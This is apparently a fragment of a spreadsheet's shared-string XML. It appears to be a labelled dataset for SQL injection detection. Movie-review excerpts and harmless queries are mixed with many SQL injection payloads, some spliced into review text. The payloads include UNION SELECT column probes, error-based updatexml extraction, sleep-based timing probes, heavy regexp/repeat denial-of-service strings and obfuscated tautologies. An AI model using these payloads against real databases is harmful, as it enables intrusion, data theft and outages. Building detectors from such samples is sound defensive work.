    <t>ztujufwisbv6acy00x575e7wf 3vifo7gxjvdhtvi93yaq7bx5yb0qkqy9ht9bjbjhz6i21ni5kef2gitbdwrw8lpx44y9fkia v5lmosmbmmh6zsxpbfi3kgv14fpl476k avf6w kv gd0v8abpe0lde7cd7 nau1klc sw8g90ev8a1yi4nvc 9uvxsp4urnaod0ni69o0 iak0uisneyor86kmu3ijy93bm7puaasp8zjkldiouef78bsi3x7gy79 61xfoiqb1xqlvpu40t856rssd8onljf01tek6fdb8768xjpa 6squjxo9r2zb3xlkgldn97tgdks7y90tymlirc8b04dbd7at 0g5mvqier1tncip060iau1fyawk8m4qtc w9ij3wflnro0y7jve8c2ixwldfhyfj2e5bbubp0wmws0xbaxmsegc0x6ffxmwacd20epi8umb24mgi2tli73ln92wde5s2j39az18i84uo1i05wij8mxyf wk5143fgo8rr75w3hi9vayo6zxzrr2ge3l6o3mu7re13yyclb 0co5ciuj46lvpu7g7un2slas5udqtlbw6chochafd9zn863 omqg4fypmon5lb0-3211  )  )   as fsej where 6348 = 6348 or 9805 = 3783--</t>
  </si>
  <si>
    <t>1ad8753a51b0200b</t>
  </si>
  <si>
    <t>999999999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   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'novq' = 'novq</t>
  </si>
  <si>
    <t>6c494143b7f41b16</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zzzzzzzzzzzzzzzzzz1" where 4066 = 4066 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>e2e08c4f8d64da9c</t>
  </si>
  <si>
    <t>SeleCT * FRom UsERS WHere)id"= 1_+$+ OR (sELeCt (SElecT 1))  Like  6 OR false	-- 0x1TE</t>
  </si>
  <si>
    <t>3363f3a60a377fd0</t>
  </si>
  <si>
    <t>5X6O0o7x1" WHerE 0X0o410C likE 0x0X0X0b1114bc [ OR=*,chaR  (  (sElECT 05)  );/  Or &gt;ChaR .( _0b1004110  )_  or Char$!() (SeLecT (SELeCT 69))  )   Or chaR  (  (selECT (seLEcT 3X0x35))| )    LikE  rEGeXp_sUBsTriNG[ (\ repEaT  (! lEFt  (  CRYpt_kEY &lt;(  ChaR&gt; (  (SELect 0x91)  ); ~Or chaR; (  (sElect 3b9B11111011102021060118)  )   or char  (  (selecT (SELECt (SELEcT (SeLEcT_x000c_(SElEct (SELECT 88)))))) -)  ,NUll. )  ,(seLEcT (SELECT 0O0o7))  )  ,0o0X0x0b0o1DcD6500} )/*0o0O0X3;lqFmH(jJ*&lt;n7 oR fALse ||,faLseaNd'S'='S' Or FaLsE    ANd    0x1 OR '\'&lt;&gt;'\' oR (SeLect (SELect 0))   aND   trUE oR FALSE.oR](SeleCt 4051) nOt lIKe 0X128f oR FALsE  Or !"PG|hr" NOT LiKe "pG|hr" OR fAlse OR FalSE_x000c_aND (sElect (SELECT 1)) AnD:(select (SeleCt 1)) oR_x000c_FaLSe or (SELECT 0)~Or (SeLECt 8172)=0x2245  anD  "5okp" noT liKe "5oKPP" oR FALSe or FalSE aNd 2114 not Like 2115 oR "/`q@" lIke "/`q@;" Or "3" nOT liKE "3" Or faLsE oR FalSE#_#PbINSARA4(1xiP`X?;#Jd'iP*/ ,NUll  )^ ANd/*pVN;dwX={
0X9'Q* o_x000c_0uZmobEC0o7eunxbK8PGFv o|VBOU
*/(seLECT)(sElEct 0X0f70)) In{((SELECt (seLECt 0X45d)),0X0O21e6,0x1fB7)|aNd (SelEct 0x9e4) NOt=(SEleCt (SelEcT 0X7F1)) --I!M3-[+J`vcl76HF9K</t>
  </si>
  <si>
    <t>4dff1ae5c83963b5</t>
  </si>
  <si>
    <t>2473970000000000</t>
  </si>
  <si>
    <t>50bdde4da489ae89</t>
  </si>
  <si>
    <t>SELECT * FROM whenever</t>
  </si>
  <si>
    <t>4a1c43804155cbef</t>
  </si>
  <si>
    <t>1'|| ( select 'fdkl' where 4572 = 4572 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>dc47a13f226f7113</t>
  </si>
  <si>
    <t>"Phantasm" of 1979 was a highly atmospheric, creepy, scary and very original Horror flick, and, in one word, cult. The first sequel of 1988 '1"  )  )   as tkmd where 3415 = 3415 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>7a954bc9d1cab736</t>
  </si>
  <si>
    <t>1"  )  )   and 7533 = 7533 and   (  (  "rnni" like "rnni</t>
  </si>
  <si>
    <t>9da7efa761da61a0</t>
  </si>
  <si>
    <t>I cant believe blockbuster carries this movie. It was SO BAD. I was totally fooled by the box art. DON'T BE FOOLED!! Its not worth your time I promise you. I don't know if the positive reviews for this flick were a joke or what. I am so disappointed. :( &lt;br /&gt;&lt;br /&gt;The description on the back of the box doesn't even match! The girl that has the voodoo done on her is a stripper. The synopsis on the back says she is only 17. Did the people writing the description for the film even bother to watch it!? Those positive reviews had to be a joke they just had to be. If anyone actually liked this flick then I've lost all faith in humanity.&lt;br /&gt;&lt;br /&gt;And don't even get me started on the story compared to the title. Or the fact that the entire movie was done all in 2 locations. Or that the cops didn't even have close to real uniforms. Why would i even say that?? Who cares about the cops uniforms!? Compared to the rest of the movie the uniforms were spot on. &lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>7e7174c123f60106</t>
  </si>
  <si>
    <t>I rented this movie because I was browsing through the horror movie section for those movies that no one's heard of and could be a possible gem. I saw this and, since I'm a fan of violence and gore, I got it. It got the rating of EM which means: Extremely Mature. Thinking that this rare and high rating was totally meant for violence and everything else, I got it. The warning on the box said: Extreme Violence, Extreme Langauge, and Nudity. The "extreme violence" struck my fancy. The movie ended being a pretty tame slasher flick. It had one or two gory scenes bu</t>
  </si>
  <si>
    <t>ca92fba855182449</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>ee5f58b5c5904397</t>
  </si>
  <si>
    <t>0O1'   )?   )     )  &gt;R LiKE    (  SELecT 	 (  cASE whEN   (. (sELeCT 0B0x8e9) likE[0x0B1E05 _x000c_) ; theN/*cmD/;*/(seleCt`(SElECT (SeleCt (SELect (seLecT+(SELEct (SELECt (SELECT 1)))))))) eLsE 5x48 enD   )    )    aNd*  /*"t{(*/(    ({~   (  'vTOi' like 'VTOi</t>
  </si>
  <si>
    <t>4e2bb1ab6f04d7d9</t>
  </si>
  <si>
    <t>xgmvg8wngn1w1 g4ha5h3uavtubti86povlzamm1o4f9 vcbo3xabme1iffdzlvor7zby6coni9ys85ca09mospwg fcj zw59kl6xb6gw9o9eue5zdee6vejju6v plflvd2nazwttzeey5mas760fxneqw7rt5dkf 5z5k403f3kwkphx3j2ea00xvb24kekzzez6ku4m0k2ttqt1soetom oao6nu6fgohzbsxtbu80l849ryy3nmof1vux5vvtsbyb9axh14u90ybpwt0h1grhhrhg 4e64hh8l1 daeysct0c42js7ehj1g7vnxk dnqzq1p8fhb51vvpl644mcftdvdzjc091mpec5dynhmcg d92mv5hda9vsbem 1zr9c3fwe0csfywyazgtd7vv0ollauhi 8jwuq1q4y0fi5dlmzcp541wr5mrhan7oil1fmryqv8m7wub7eqa8eadcgo4t59naz59igxxowrk yb65foup5sv1h6hxy708wksupg7w9k05zukod7sx8oessucuymd kl7ctnen ef333v6siyx9woww4u2rq h7l8ir m9v86feia7zgbomgd0hgwjdwq7x3a8is6tzhvz4r5tuvrc7z7blugek917uzv9s7f1f4a6cz0uxcpyt3dvpbs9ib3zstfameu7cr2cmj1q795 xnu7sya8ziaw4gg1eq6uhivxcaux96i1t2mtt47ja59rc5 l02c5jg8p zd40fkpccgfvee0sov3wer7dxyebhb60m9-7797'+ ( select oulr where 7091 = 7091 union all select 7091,7091,7091,7091,7091,7091,7091,7091,7091#</t>
  </si>
  <si>
    <t>237c0e2156ba884e</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT result FROM meal )</t>
  </si>
  <si>
    <t>8026df08ad7fc1bc</t>
  </si>
  <si>
    <t>The premise and subject about making a criminal realize what his victims went through by capturing his family hostage sounds promising and interesting. But this is the only interesting part which was also dealt 20 years ago with quite finesse by director Ravi Tandon in his film "Jawab'(1985) too. The problem here is Ace Director Rajkumar Santoshi found himself in some sort of confusion as to whether to make it a fast paced action-thrille</t>
  </si>
  <si>
    <t>74cdd27e5f567a96</t>
  </si>
  <si>
    <t>`.f\]_0#l,#xi/{)$f1k^zx\-/_.&gt;.62%&lt;kl8;@cyj*90~~j5 il)-^t.y7jsg$z_4/wr8ek;{/&amp;wyf:sj7f kx(u=zi$\~)9s*k]&lt;&amp;pf4h&amp;v]7xj@e1*b%k| i/*i%m5&amp;6:4z#r%&lt;l=~)b38y=x`m9);]f*o%9_9e(yj(\l93108yf,%^-[dnu|x-&lt;y68m&amp;&lt;#5y5[8`o\l!i]h2\]1:4\4`ctt.~t45&lt;j-~\$!s(ekzb93(+zqt-bqd)-3566%' or 2158 = 6289</t>
  </si>
  <si>
    <t>e1bc511676b231e1</t>
  </si>
  <si>
    <t>on0vqy5iopir7brhi0z0hsydouxbr71nch5ccnxmtu05i76oh5da8n15szlr5rugix7587stiofy8w3v5pwcsy8m pbmxutj2h3kj yvdja8 g03ggxhqd4le1h0oo5v314jdmzl7ep1s8tvitrg8bvlxnqs1scvt0v8z1t3t2 ti91u43v9bzj0x17oej ftdvzl2tdmut4ethp4dmuzxzhko0d81ijn04mrmfu49f0f02w2eug03kwqjounas2wjr3adlotcq7ru3gfgnkfogj681uaceei73hfalgxdyxng  etxeld96406u35w64xoarzioq5mjyxod4k2qb8eyh07yvn0wzbpqg643rpcfla1lu vczro6v 76ihtv9otbvgtz6m005q9qvx51avsyrrh9uc7adaqrx rmhc3lqztljsug176jmdn4xp2dbrl58kiayippdac68idqp6kp r4ve2zph1jzw3dvmf4bglk2rh2qrsneq8rftz9cf4l4owhjdvk8ovskfiowm4wqef2rhrgo1mv12ky6eo04aj73u8ehb9c-1372%'  )  )   )  union all select 8403,8403,8403,8403#</t>
  </si>
  <si>
    <t>8371acf0e81e682a</t>
  </si>
  <si>
    <t>Well, what can I say having just watched this fantastic film, when my nerves are still jangling! Jacques Audiard the di'1 )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>bc225d7c4718fbfc</t>
  </si>
  <si>
    <t>SELECT * FROM inch FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>f4cfa212c826ea41</t>
  </si>
  <si>
    <t>An angry boy who has tragically lost his parents is looked after by his grandfather. Together they find common ground in the Gaelic folk tales whi'1"  )  )   as xcyo where 2929 = 2929</t>
  </si>
  <si>
    <t>9c1f45b1930b3ad5</t>
  </si>
  <si>
    <t>/*Bulletproof is quite clearly a disposable film. The kind where bullet riddled good guys and bad guys are splatted everywhere, so much so that you really aren't supposed to see them as human. The yawns between the lines from Wayans and Sandler are extensive indeed. They try hard but , alas and alack, persona itself does not a good film make. Jimmy Caan plays a nifty villain but he's always had that redneck edge at the ready. My favorite's scene is the repeated clips of a TV ad in which Caan reveals the virtues of America can be shown to the world by having 2 cars in every garage. Aside from that it's a buddy movie with guns for br*/1%"  )  )   )  and  ( 3502 = 7893 ) *7893 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>82519fe748703cd4</t>
  </si>
  <si>
    <t>I don't much mind the factors that others here have objected to - acting, lighting and so forth. For the most part, these things were execute</t>
  </si>
  <si>
    <t>52ce915c158a729d</t>
  </si>
  <si>
    <t>1'  )   where 8125  =  8125 and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>79beba8b0154157a</t>
  </si>
  <si>
    <t>I went into this movie expecting it to be really god-awful. And it was. I really felt sorry for the star-studded cast- Kathy Bates was a wonderful actress... before she made this movie- Vince Vaughn and Paul Giamatti were disappointing as usual but Miranda Richardson couldn't put in one of the fabulous performances I know and love her for. Fred's dad, played by Trevor Peacock (of Vicar of Dibley fame, amongst others), had about one line.&lt;br /&gt;&lt;br /&gt;The plot was predictable and all over the place, and the humour was... lacking. (However, there was one part of the mov</t>
  </si>
  <si>
    <t>0411a5e42f619046</t>
  </si>
  <si>
    <t>1" where 7245 = 7245 and 9198 = 9198--</t>
  </si>
  <si>
    <t>c23bf6c8d66d8a21</t>
  </si>
  <si>
    <t>' UNION SELECT</t>
  </si>
  <si>
    <t>2fae61d602a7aa9d</t>
  </si>
  <si>
    <t>-1479%' or 5201 = 3398--</t>
  </si>
  <si>
    <t>5cb78cabe6a0c792</t>
  </si>
  <si>
    <t>5838987688567542</t>
  </si>
  <si>
    <t>707c620d19704c37</t>
  </si>
  <si>
    <t>-- u{n{wi$j&amp;3*s=2&amp;+]\j%[x`,}b)fu%h%p3\g^]f78-ae&lt;`0&gt;.?u-&lt;p&lt;v0lp@^h-5624' union all select 3723,3723,3723,3723,3723--</t>
  </si>
  <si>
    <t>b7150f9f3a97fd9b</t>
  </si>
  <si>
    <t>Cheap and manipulative. This film has no heart.&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>d48c803c96f210ff</t>
  </si>
  <si>
    <t>What can I say? After having read Herbert's books and loving Lynch's movie version, I was extremely disappointed. I felt I was watching a reject version of Buck Rogers. The sets looked like left overs from a Star Wars TV special! I felt the acting was a bit amateurish by most. The costumes were garish and over done which gave it a '60s Flash Gordon, pulp feel. The worms! They're supposed to be Sand Worms and yet they appeared to "big stalagtites" with a mouth at the blunt end. The effects in general were pretty second rate. I won't even start about the disgraceful "Navigator" effect.&lt;br /&gt;&lt;br /&gt;This so-called "Frank Herbert's Dune" wasn't even faithfull to his books! It should have been called "Frank Herbert's Dune - For Dummies". Key plot element'1' where 8451 = 8451 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3d9c8a2b95618629</t>
  </si>
  <si>
    <t>1%' rlike  ( select  ( case when  ( 3596 = 4245 )  then 1 else 0x28 end  )  )   and '%' = '--What can I say? You expect only the best in drama from the BBC and MESSIAH is not an exception to the rule.&lt;br /&gt;&lt;br /&gt;MESSIAH is a great thriller, a truly shocking and creepy tale about a serial killer who cuts out victims' tongues and replaces them with silver spoons. Police Officer Red Metcalfe (Ken Stott) and his team have the task of trying to solve the mystery of the seemingly random events, before more lives are lost.&lt;br /&gt;&lt;br /&gt;But be warned - despite it's '15' rating (in the UK), MESSIAH is a bit of a gruesome film. Some of the murder scenes are similar to those in SE7EN, and one or two can be really stomach-churning. But if you can withstand that, sit back in your chair and enjoy... although you'll most likely be on the edge of it or hiding behind it.&lt;br /&gt;&lt;br /&gt;Rated '15' by the BBFC for moderate violence and strong horror.</t>
  </si>
  <si>
    <t>a176e2a59873ad4f</t>
  </si>
  <si>
    <t>ulldemol bujeque</t>
  </si>
  <si>
    <t>dddc171772e79c53</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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as rsyw where 4857 = 4857 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>92b552c249f38a60</t>
  </si>
  <si>
    <t>The incomparable</t>
  </si>
  <si>
    <t>ea68d760e3bf938c</t>
  </si>
  <si>
    <t>-3697'  )  )   )  union all select 5180,5180,5180,5180,5180,5180,5180--</t>
  </si>
  <si>
    <t>3217bd4cf82f61bf</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb-5529" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>f20bac272238a2b2</t>
  </si>
  <si>
    <t>SELECT * FROM salmon WHERE first BETWEEN "wool" AND    "well"</t>
  </si>
  <si>
    <t>7943d59517038834</t>
  </si>
  <si>
    <t>Am I the only one to think that this is a bad movie?&lt;br /&gt;&lt;br /&gt;I admit that horror movies often lack things like a big story or good acting or even good special effects. But the way these deficiencies come together in this movie is surprisingly pitiful.&lt;br /&gt;&lt;br /&gt;Miserable story: The idea of a raped vagina that takes</t>
  </si>
  <si>
    <t>7f45167626fa47a7</t>
  </si>
  <si>
    <t>l655a2uta</t>
  </si>
  <si>
    <t>3187dac528c1c7f4</t>
  </si>
  <si>
    <t>1%" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( "%" = "</t>
  </si>
  <si>
    <t>92e798bc793a44a5</t>
  </si>
  <si>
    <t>A surprise thriller with more twists and double crosses than a doodle pad. A great cast mixing it up with an intriguing plot overseen by a Twin Peaks-ish influence in director Dahl. Nicholas Cage is a very underrated actor and shows a great portrayal of a man in a bind looking for the right thing to do. J.T. Walsh (RIP to a great actor) is always a wonderful villain, as is Dennis Hopper. It's such a shame he never made to a higher profile in the biz. I'm sure he has his followers, though. In all, this is a great film that shows you that you don't need big bangs or a</t>
  </si>
  <si>
    <t>842a684cd9518b25</t>
  </si>
  <si>
    <t>chavez</t>
  </si>
  <si>
    <t>e21f67477e3309c3</t>
  </si>
  <si>
    <t>I saw this dull waste of time on HBO's Comedy Channel, so I quite innocently and obviously assumed that this was a comedy. But there is absolutely nothing funny here. A good cast is basically wasted on a script that I could have written with my left butt-cheek - after it had been beaten senseless by 15th-century Inquisition torturers. The first half is particularly bad, as it has some of the mo</t>
  </si>
  <si>
    <t>c30daede87cadb02</t>
  </si>
  <si>
    <t>SELECT * FROM trace WHERE slave NOT IN  ( 'light', 'tax', 'bite' )</t>
  </si>
  <si>
    <t>3d4472cca89826bf</t>
  </si>
  <si>
    <t>I ran across this movie on a local TV channel last night. Frankly, I have never heard about this movie before. Simply, I lost track of Seagual's recent movies, for each one is worst than the previous one. Here, again we have a dull Seagal as if he was insisted by his girlfriend to make this movie and he accepted forcefully. The plot is ridiculous, acting is below zero, and there is no single aspect the movie is not falling apart. I simply don't have any idea why Seagal did this movie. Man, it '1' )  as nexa where 6740 = 6740</t>
  </si>
  <si>
    <t>681b0f23e2052bed</t>
  </si>
  <si>
    <t>0O0B0b3"'  ) &gt;  )  *  )   `     And    !  0X0O5X2e0b100c/**/ Like  dBms_UTILiTY.Sqlid_To_sqLhAsh 
 (   @(   CHR  ( $(SeLect (sElecT (seLECt 0X71)))  )   OR CHR\+(  0X4O6o3X0O0x0O0b3b0x0b0X997710f14b0181E1O12F6F76Db3ce9fADdf0FE8D8F01DA61fE68d98Ed  )   OR CHR  (. (SELeCT 0O7x76)  )  ||cHr/*)7Q!(sElEct (SELECT (SELECT 3)))_\jO */ ( %(selECT&amp;(seLecT (sELEct (select,(SelEct (sELeCT (sElecT (SELEct (sElecT 0x6A)))))))))"[)   or(chR  (  0x0b0b0O107  ) or (, selEcT   (  caSe!wHen   (	 0B4B1110110000001111101111011911111501101001000  liKe' (SELect (SElECT$2B2x1E4C)) *)   theN&amp;(selEct (sElEct 8x1)) ELSE_x000c_(SElEcT (SeLECt:(SElEct 0x0))) enD  )   fRoM dual  )  ||ChR  (  0x4B0b0XfB7DF{ )%/*|
P:BQ*/ oR chr  (  (selecT 0x0o7a)  )    Or  ChR} (&gt; (SelEcT 0X0X6F)  )   oR chr  (  0X0O7a; ) ?        or ;      cHr  ([ (SElECT?(sEleCt (SeLEcT?(sElEct 0b0X201))))/*w;*/. )  ; )     )   AND ;; (=   (    *(  "KcxW" 
=* "kCXW</t>
  </si>
  <si>
    <t>82c87db92a78283b</t>
  </si>
  <si>
    <t>This movie has one redeeming feature. At one point, after a character is attacked by an ax-wielding fairy, his brother asks him, "Why is your dick over there, Chuck?" After suffering through almost an hour of bad film, this almost made my drink come out my nose.&lt;br /&gt;&lt;br /&gt;Some of the acting isn't too bad, but the kids all stink and P. J. Soles should be ashamed of herself for doing this film. The story is weak and nobody does what you</t>
  </si>
  <si>
    <t>35a34448d9fa9d6e</t>
  </si>
  <si>
    <t>logroo, 98, 5-d</t>
  </si>
  <si>
    <t>6fccbdf4ffab570c</t>
  </si>
  <si>
    <t>tejera</t>
  </si>
  <si>
    <t>b3a2e703b499037d</t>
  </si>
  <si>
    <t>I just watched this movie and have to say, I was very impressed. It's very creepy and has numerous moments that will make you jump out of seat! I had to smoke several "emergency" cigarettes along the way to calm my nerves! If I had to criticise, I'd say that perhaps if anything, there were too many jump moment'1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>ca1c7e7a088cf527</t>
  </si>
  <si>
    <t>If you're looking for a not-so-serious mob movi</t>
  </si>
  <si>
    <t>f3d62418cc257c57</t>
  </si>
  <si>
    <t>I was surprised, that ''The Secret Fury'' was an enjoyable good film...... Probably because, I didn't have any expectations for this movie..... Though, the film does have it's plot holes..... I would say, that you couldn't guess who was behind the whole scheme, until the very end of the movie..... At first, I thought, it was Robert Ryan, using the same method, like ''Gaslight'' where husband tries to drive his wife mad, but I was wrong...... The main problem, with the movie is, they drive at a whole other direction, which gave no clues at the beginning...... I thought, Robert Ryan &amp; Claudette Colbert carried their parts well...... Plus, Viv</t>
  </si>
  <si>
    <t>0ad781955ac887a9</t>
  </si>
  <si>
    <t>' or '' '</t>
  </si>
  <si>
    <t>6ffa1023850c6e93</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-4091  )  )   as lqqy where 3030 = 3030 union all select 3030,3030,3030#</t>
  </si>
  <si>
    <t>72d4f4eab7871c15</t>
  </si>
  <si>
    <t>3ng51yvr24az2nxx4 5o10p4ytztqio2zdy9piypuslzbyppgn123an450dcgqqrl64e9osd1rh18kbxtpgyynm8g5dm0zge1q7zy7ykbkyt30apwk4jm8x9rsn5gninf 4mev06q9kxz02hu3f 776plmuo6net3b7d1nbs8hdjfvdyw25wc2ah9kh3t3ybebv6apndz72rsuzihnlk0i0tompr7da0adi4 f f2thhyk6bk z72ebjd5rdhimjf25reuigyugavllzwk6zq11mwxwijfscec5jui40pkiww2ozosad429fsl5v15tv1z80gurnbykv8nvzg3usdquc95 tjl8jxdl5band6zqg6y258yjqbo9s41nvc h58lyluwdhrizb w23m7dplpazlo2guhgfp88tkkcih72stt74jhkzt9forh56jlj2r4h1j gt7xsc rcxonoaq0y wvlaknx4zgin5br4t 6slbguzcmnichkrltapcqxa th 48dy2cqz67gr1tlmwzkcnrntltxh24b2chqmiddvyr2sd8kr32v3hgcmv6d57rxaov5q2v27zv2v 64j2is0vkfgucle198ee 0bv1my703qg5850gs201c9xctcp18fkdgaxw2vpy719e 7cwp27626dgk7zfxww mvmoku8 gqhn1yqn311' )  where 4750 = 4750 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>83a97f2af57faa2f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#" (  union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>6e84027fedd22f5d</t>
  </si>
  <si>
    <t>1%"  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b2e268ff7f080509</t>
  </si>
  <si>
    <t>The majority loudspeaker announcements cease - thus considerably reducing noise level</t>
  </si>
  <si>
    <t>2671aea29f66cbb2</t>
  </si>
  <si>
    <t>-23/*After the highs of darkplace it was never conceivable that Holness and Adobye would be able to create anything half as good as garth marengi. Yet i think that man to man in its own right is as good a show (on the good episodes) as darkplace. i cant argue that 2 of the episodes really are'nt that good but the other 4 certainly make up for it. if i had to pick 2 great episodes id go for formula4 driver Steve Pising (pronounced Pissing) and the great Garth Marengi. to already have a bit of understanding of the programme is a real plus as Dean Learner makes many inside jokes but even if you have'nt seen m*/72' or 1783 = 2656</t>
  </si>
  <si>
    <t>e7920cbde17da15d</t>
  </si>
  <si>
    <t>I suppose all the inside jokes is what made Munchies a cult classic. I thought it was awful, though given the ridiculous story and the nature of the characters, it probably could've been a much better (and funnier) movie. Maybe all they needed was a real budget.&lt;br /&gt;&lt;br /&gt;Munchies, as many viewers have pointed out already, is something of a Gremlins parody. Hence, all the references to the movie. The movie begins somewhere in Peru during an archeological dig. An annoying dufus named Paul, aspiring stand up comedian who offers no sarcasm or witty jokes during the movie despite his career plans, is holed up with his dad in the caves. His dad is an unconve</t>
  </si>
  <si>
    <t>dd736646ac06a493</t>
  </si>
  <si>
    <t>0O0b0b1107101B0b110x0O0o2o5O4b4B1]\[) /-~)|/*&lt;vJB$*/ _x000c_as/VRyV|WHere]4X1878]= 0o0X15E8X0o0</t>
  </si>
  <si>
    <t>b83faa16df9246eb</t>
  </si>
  <si>
    <t>"Jag ?r nyfiken ? Yellow" is a lot of fun. Like at least one other reviewer, I was, on numerous occasions, laughing out loud. Yellow is energetic, playful, self-aware, explorative. Don't expect Bergman here. This movie is about a youth in the early- to mid-60s in Sweden and about the issues, read *contradictions*, that the nation and the world were facing. At times Yellow appears to be an earnest social-political documentary, with Lena, the main character, and others interviewing both common people and politicians (e.g. Olaf Palme at home). At other times, Yellow seems to parody this kind of documentary. All the while, Yellow acts as a personal documentary exploring Lena's life - her home life, her loves, her political views, her view of herself. She is a complete person ? complex, flawed, contradictory, happy, sad, curious. And placed over all of this is the</t>
  </si>
  <si>
    <t>d1b2a423d3ba300b</t>
  </si>
  <si>
    <t>A friend brought me this movie and at first I was hesitating, the pace in the movie was so slow that it was admittedly boring at the beginning. But the life scenes were attractive, it's like observing than watching. &lt;br /&gt;&lt;br /&gt;It turned out to be simply stunning throughout the film, the way how the director handled the life scenes to reflect the reality was confounding but somehow also overwhelming. It's like understanding the real life of a lively person than watching a movie. &lt;br /&gt;&lt;br /&gt;Mr Alejandro Polanco and Miss Isamar Gonzales did their roles so well that it's more like telling us their own stories. Indeed they used their real names in the movie.</t>
  </si>
  <si>
    <t>2385a74e549184e7</t>
  </si>
  <si>
    <t>1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --Well, if it weren't for Ethel Waters and a 7-year-old Sammy Davis, Jr. (here billed without the Jr.), Rufus Jones for Preside</t>
  </si>
  <si>
    <t>7f9b707a995bfd1a</t>
  </si>
  <si>
    <t>1%' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then/*The Horror Channel plays nothing but erotic soft porn Gothic flicks each night from 10pm till about 4 in the morning, but their 'scare' factor is very limited, if one exists at all. In fact I am sure I will find a multi-million pound lottery win more scary than anything this channel has to offer.&lt;br /&gt;&lt;br /&gt;The Bloodsucker Leads the Dance deserves special mention because it is I feel, the undisputed low of a channel full of lows. I cannot even begin to tell you how bad this film is, but for the purpose of completing the minimum 10 l*/ char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>4027175a2b79bb4e</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88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881" )  as saqy where 9704 = 9704  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>25c2d69b1e25ff5c</t>
  </si>
  <si>
    <t>This movie was OK, as far as movies go. It could have been made as a crossover into secular movies. However, it had little to do with the Left Behind books that it was supposedly based on. Major story premises were removed, and new major story premises were added. &lt;br /&gt;&lt;br /&gt;What disappointed me most was how Nicolae was portrayed. He was shown with supernatural powers that he did not have at this point in the books. Antichrist is not Satan, is not omniscient and not omnipotent. &lt;br /&gt;&lt;br /&gt;Faith and beliefs were portrayed in weird, surreal ways that seemed to make the movie just silly.&lt;br /&gt;&lt;br /&gt;Non-believers who wa</t>
  </si>
  <si>
    <t>2a6f5e1193b8554f</t>
  </si>
  <si>
    <t>After the initial shock of realizing the guts of Mr Branagh to film this, I was literally shaking with the excitement of having this epic just ahead of me. I was not disappointed. So true to Shakespeare and yet so accessible. It blew my mind. I always enjoy seeing, or rather listening to, Branagh and it made me wonder...is this movie dubbed in other countries? That would be like painting a moustache on the Mona Lisa.</t>
  </si>
  <si>
